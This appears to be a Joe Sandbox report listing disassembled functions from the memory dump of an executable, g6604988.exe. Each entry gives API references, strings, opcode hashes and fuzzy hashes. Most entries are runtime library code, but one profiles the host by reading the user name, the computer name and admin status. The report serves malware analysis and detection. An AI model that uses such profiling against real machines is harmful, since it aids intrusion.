Opcode Fuzzy Hash: 8275b8a4706be798be71a044681e2ead031687a89998113fde28333f61ba7d0c
Instruction Fuzzy Hash: 1501A73221B212AEA63D3ABC7CC46DB2BA5FB716FE720023AE535951DAEF114851D240

Uniqueness

Uniqueness Score: -1.00%

Function 011BE971 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, xrefs: 011BE976

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
API String ID: 0-2518443555
Opcode ID: c0d6c36280296f66b9d5d2c476af9e1c6dd2b50358bc6ae7bd51ddc1a0da06b2
Instruction ID: 6004f17bb4384c133fcabfe927eee32d82846d514f12f9abef68c9d115f72d2c
Opcode Fuzzy Hash: c0d6c36280296f66b9d5d2c476af9e1c6dd2b50358bc6ae7bd51ddc1a0da06b2
Instruction Fuzzy Hash: D921D17160520AAFDB2DAF799CC0DEB7BADFF102687004624F929D7150E730EC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 011B7F96 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 011B7FD8

Strings

.com, xrefs: 011B8018
.exe, xrefs: 011B7FE5
.bat, xrefs: 011B8007
.cmd, xrefs: 011B7FF6

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 379a49f00e6d3112fdad177f1ba665e2daa0de7ebd2eba848fa7e001c745d01b
Instruction ID: e6ae98b44719342801f615315a5c3b3c47aa266a09f7f837e15b64206ae561d9
Opcode Fuzzy Hash: 379a49f00e6d3112fdad177f1ba665e2daa0de7ebd2eba848fa7e001c745d01b
Instruction Fuzzy Hash: 6D01D63770462625772C242D9CC1BBA6F9C9BA6DF4726012EF954F71C0EF94D80281E1

Uniqueness

Uniqueness Score: -1.00%

Function 011B6454 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 011B64A4

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 8f875b7e91c136d0031e04fdd0389315a3456b3ddf20c536391cfa9d447b21ae
Instruction ID: ef8aa495d1732f1ea9b373a756866bba686ac7b9578df0ae74f2eafb39c6a3e5
Opcode Fuzzy Hash: 8f875b7e91c136d0031e04fdd0389315a3456b3ddf20c536391cfa9d447b21ae
Instruction Fuzzy Hash: D4112E31A05A21EFDB3F4AACECC4AAB3B599F21760B120234ED15A7284D734DD00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 011B7503 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,011B74F8,?,?,011B74C0,?,?,?), ref: 011B7518
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 011B752B
FreeLibrary.KERNEL32(00000000,?,?,011B74F8,?,?,011B74C0,?,?,?), ref: 011B754E

Strings

CorExitProcess, xrefs: 011B7523
mscoree.dll, xrefs: 011B7511

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 885ac1445f18f5f4b3991f994f3d6cd9386d3070c46167d9e199a4d248578041
Instruction ID: 1020338bd7960ca7932a6bc7b69e3fc9415adf37e1590c01fb4e12bc00624d1e
Opcode Fuzzy Hash: 885ac1445f18f5f4b3991f994f3d6cd9386d3070c46167d9e199a4d248578041
Instruction Fuzzy Hash: DAF08230601258FFEF299B95ED0ABDD7E79EB40B55F100078E501A1094CB709B40DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 011C2697 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 011C2719
_free.LIBCMT ref: 011C273D
_free.LIBCMT ref: 011C28CA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,011D1710), ref: 011C28DC
_free.LIBCMT ref: 011C2A96

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 58cededdd44c962a9b9c6c9d5b8f149cd93bc31b6dae797f7fedfbda95655ea3
Instruction ID: a57a333e54f1fa6157d5e39f528266b0d6068de380a9c2044a451f67566e01d3
Opcode Fuzzy Hash: 58cededdd44c962a9b9c6c9d5b8f149cd93bc31b6dae797f7fedfbda95655ea3
Instruction Fuzzy Hash: D2C15571A01216AFDB2DAF7DCC80BEE7BF9AF76A54F14006DE99197281E7308A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 011B7CCE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,011B7C00), ref: 011B7CF0
GetFileInformationByHandle.KERNEL32(?,?), ref: 011B7D4A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,011B7C00,?,000000FF,00000000,00000000), ref: 011B7DD8
__dosmaperr.LIBCMT ref: 011B7DDF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 011B7E1C

Part of subcall function 011B8044: __dosmaperr.LIBCMT ref: 011B8079

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 0c004fe27877fe4313e345b9a5fe598817c39c9d2fe90fd3249062602234bf1c
Instruction ID: c073b03101e5e9645d29222c1d189cf06736f43d6c6dbc8c207dfb8203bae7a7
Opcode Fuzzy Hash: 0c004fe27877fe4313e345b9a5fe598817c39c9d2fe90fd3249062602234bf1c
Instruction Fuzzy Hash: E7413C76900749AFDB29DFB9DC849EFBBF9EF88240B10452DE956D3690E7309840CB61

Uniqueness

Uniqueness Score: -1.00%

Function 011BFCDF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 011BFCF7

Part of subcall function 011BB361: HeapFree.KERNEL32(00000000,00000000,?,011BA493), ref: 011BB377
Part of subcall function 011BB361: GetLastError.KERNEL32(?,?,011BA493), ref: 011BB389

_free.LIBCMT ref: 011BFD09
_free.LIBCMT ref: 011BFD1B
_free.LIBCMT ref: 011BFD2D
_free.LIBCMT ref: 011BFD3F

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 696cc0a326adc12691433abe71e7be1e2f25c8a466e915e7971b1362a0495279
Instruction ID: 62eace2181f4590dbf441a3b8f0f02edc4b8922e8127c91f2c0b8f7042684f37
Opcode Fuzzy Hash: 696cc0a326adc12691433abe71e7be1e2f25c8a466e915e7971b1362a0495279
Instruction Fuzzy Hash: DAF0623240FA066B962CEA69E8C0C8A77E9FA047203641815F525D7914CB30F8C28764

Uniqueness

Uniqueness Score: -1.00%

Function 011BE3AC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 011BE546

Strings

*?, xrefs: 011BE3EF

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
Instruction ID: 1e4e79a2e22ba046174db37d437d3ea2bd4c443e7d4a84dea6cd51344e77d927
Opcode Fuzzy Hash: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
Instruction Fuzzy Hash: 7E614CB5E052199FDB19CFA9C8C09EDFBF5EF48314B15816AE805E7300E735AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 011B1180 Relevance: 6.4, APIs: 4, Instructions: 408COMMON

Download Yara Rule

APIs

Part of subcall function 011A41F0: GetVersionExW.KERNEL32(0000011C,?,00000000,0000000F), ref: 011A4461

Part of subcall function 011A4900: GetVersionExW.KERNEL32(0000011C), ref: 011A4960

IsUserAnAdmin.SHELL32 ref: 011B11BA

Part of subcall function 011A2BC0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 011A2D21
Part of subcall function 011A2BC0: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,?,00000000,00000001,?), ref: 011A2D4F
Part of subcall function 011A2BC0: RegCloseKey.KERNELBASE(?,?,?,00000000,00000001,?), ref: 011A2D5B

GetUserNameA.ADVAPI32(?,00000104), ref: 011B1242
GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?), ref: 011B12A1

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: NameUserVersion$AdminCloseComputerOpenQueryValue
String ID:
API String ID: 3335310882-0
Opcode ID: 22fffeb8e17ec96e514e33883bec03ba2103e43d8347fcf4796281553b3c33ce
Instruction ID: df3d472c322b76ba6b79b0de79d802391f1e7dcb8962e314a867a39f906256cc
Opcode Fuzzy Hash: 22fffeb8e17ec96e514e33883bec03ba2103e43d8347fcf4796281553b3c33ce
Instruction Fuzzy Hash: 79F1D5B5E101195BCB1CFB34DCA57EE7775AB64208F8441E8C40AA3286EF315B99CF92

Uniqueness

Uniqueness Score: -1.00%

Function 011BD92F Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 011BD9B6

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
Instruction ID: 9ba0ed75d94ffa54c82685af4b475ef70eb4bb02f891439707b33655135491bd
Opcode Fuzzy Hash: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
Instruction Fuzzy Hash: 91B155329042469FDF2DCFA8D8C0BEEBBE5EF56358F1441AAD8449B241E7348902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 011A41F0 Relevance: 6.2, APIs: 4, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4d0fec6e5c0cde28a7584d94ce84973cfa598575266662b69d121eac5d9d16
Instruction ID: 1184ed67181c4f5a0805563f87ba0d47b4b4a7e215083edbd3500988deb53419
Opcode Fuzzy Hash: 4a4d0fec6e5c0cde28a7584d94ce84973cfa598575266662b69d121eac5d9d16
Instruction Fuzzy Hash: 00714834E012589BDB2CEF68DC857ED7FB1EB41314F880198D80597A81EBB08985C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 011A4900 Relevance: 6.1, APIs: 4, Instructions: 146libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 011A4960
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 011A49CF
GetProcAddress.KERNEL32(00000000), ref: 011A49D6

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: dfb98e3a4b1a5cca417da936f502aa91dd258256f4e54858db6118993c37189d
Instruction ID: 5d99d93e4dff2faa64218b98791c6f06ac98b9f7434e740527c9fb73b986d863
Opcode Fuzzy Hash: dfb98e3a4b1a5cca417da936f502aa91dd258256f4e54858db6118993c37189d
Instruction Fuzzy Hash: 4E4179349002188BDB2CEB78DC957DDBF70EF49314F8402E8D80A97681EB715E908BD5

Uniqueness

Uniqueness Score: -1.00%

Function 011C533E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 011C540E
_free.LIBCMT ref: 011C5437
SetEndOfFile.KERNEL32(00000000,011C101E,00000000,011BB1FE,?,?,?,?,?,?,?,011C101E,011BB1FE,00000000), ref: 011C5469
GetLastError.KERNEL32(?,?,?,?,?,?,?,011C101E,011BB1FE,00000000,?,?,?,?,00000000), ref: 011C5485

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 3a90dd76a7a1519e39086be7d9dfb84cc9d6f50b82f09ff5b55d56943e499b2d
Instruction ID: 2288b106df5b7ca4ce3bad8b472b58b8de238d310bfebe283a5cd4f1bec1264c
Opcode Fuzzy Hash: 3a90dd76a7a1519e39086be7d9dfb84cc9d6f50b82f09ff5b55d56943e499b2d
Instruction Fuzzy Hash: 8E411532B046029BDB5D6BACCC81BDE7B7AEF64B25F240118F921A71A0F770E8408761

Uniqueness

Uniqueness Score: -1.00%

Function 011BE2DD Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 011B792F: _free.LIBCMT ref: 011B793D

Part of subcall function 011BF2B4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,011C4EB0,?,00000000,00000000), ref: 011BF356

GetLastError.KERNEL32 ref: 011BE345
__dosmaperr.LIBCMT ref: 011BE34C
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 011BE38B
__dosmaperr.LIBCMT ref: 011BE392

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e4bd745cea653476cf250eea6d65553ad0cc1f9a4d52dfdf2383564cbcc2fb60
Instruction ID: 02e1c952d3af12e3c5f23bc38934146b7db669f500a63a82d8d80329007097c6
Opcode Fuzzy Hash: e4bd745cea653476cf250eea6d65553ad0cc1f9a4d52dfdf2383564cbcc2fb60
Instruction Fuzzy Hash: DE21DA7160A61AAFDB29AF65CCC0DEFB7ACEF042687104514F85597160D730EC4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 011BBC52 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,011B78AD,?,?,?,?,011B837B,?), ref: 011BBC57
_free.LIBCMT ref: 011BBCB4
_free.LIBCMT ref: 011BBCEA
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,011B78AD,?,?,?,?,011B837B,?), ref: 011BBCF5

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a8e88772645de5bf58d469644c94c154d86651ae185559860b67d87cfc30694d
Instruction ID: 1666520ae4826db6af373118b2d335065520f1895a8c1fa93346600c119572cd
Opcode Fuzzy Hash: a8e88772645de5bf58d469644c94c154d86651ae185559860b67d87cfc30694d
Instruction Fuzzy Hash: 5A114C3230E502AEDF3DB6BDACC4EEB2A599BD1178B240234F634D65D1EF6088418354

Uniqueness

Uniqueness Score: -1.00%

Function 011BBDA9 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,011B8315,011BB387,?,?,011BA493), ref: 011BBDAE
_free.LIBCMT ref: 011BBE0B
_free.LIBCMT ref: 011BBE41
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,011B8315,011BB387,?,?,011BA493), ref: 011BBE4C

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 570af4202e6fbc1d8a1b4655249b64c47e42c720bb4569a081102112c12f93d4
Instruction ID: ef45bf502d31a6047daeddda78f78a2940713aa7e484e48544ace164325e19b9
Opcode Fuzzy Hash: 570af4202e6fbc1d8a1b4655249b64c47e42c720bb4569a081102112c12f93d4
Instruction Fuzzy Hash: 40114C3230E5116EDF2D25796CC0EEF3559DBD1178B240234F634D65D1DF3088418255

Uniqueness

Uniqueness Score: -1.00%

Function 011BC58B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011BC6F0,00000000,?,011C212B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 011BC5A1
GetLastError.KERNEL32(?,011C212B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,011BC6F0,00000000,00000104,?), ref: 011BC5AB
__dosmaperr.LIBCMT ref: 011BC5B2

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 59e3813d2e1e3576207315bc7b6af32fb3fc9b5682548b48aea1a3c533283f5a
Instruction ID: 4367a28a926677e441cdd24f86705acf74f4b31fc25caedf06f4216681397aeb
Opcode Fuzzy Hash: 59e3813d2e1e3576207315bc7b6af32fb3fc9b5682548b48aea1a3c533283f5a
Instruction Fuzzy Hash: D8F01D72200516BB9B295FAAD888E9BFF6DFF446A03158521F52DC7420D731E8A1DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 011BC5F4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011BC6F0,00000000,?,011C20B6,00000000,00000000,011BC6F0,?,?,00000000,00000000,00000001), ref: 011BC60A
GetLastError.KERNEL32(?,011C20B6,00000000,00000000,011BC6F0,?,?,00000000,00000000,00000001,00000000,00000000,?,011BC6F0,00000000,00000104), ref: 011BC614
__dosmaperr.LIBCMT ref: 011BC61B

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 544c851f68a6cb84f687b3d3ff2bb0d9168e9d591366935347be8d862ad2ffe6
Instruction ID: fd4c91feec85e4b972da5a5e1cc0a6ce43eb083baaf92caab49c3ab770ffe392
Opcode Fuzzy Hash: 544c851f68a6cb84f687b3d3ff2bb0d9168e9d591366935347be8d862ad2ffe6
Instruction Fuzzy Hash: 75F06D32600116BB9F285FAAD888E9AFF69FF546A03154521E529C7120D731E861CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 011C67BF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(011A4B80,00000000,011D4788,00000000,011A4B80,?,011C5E17,011A4B80,00000001,011A4B80,011A4B80,?,011C18EE,00000000,?,011A4B80), ref: 011C67D6
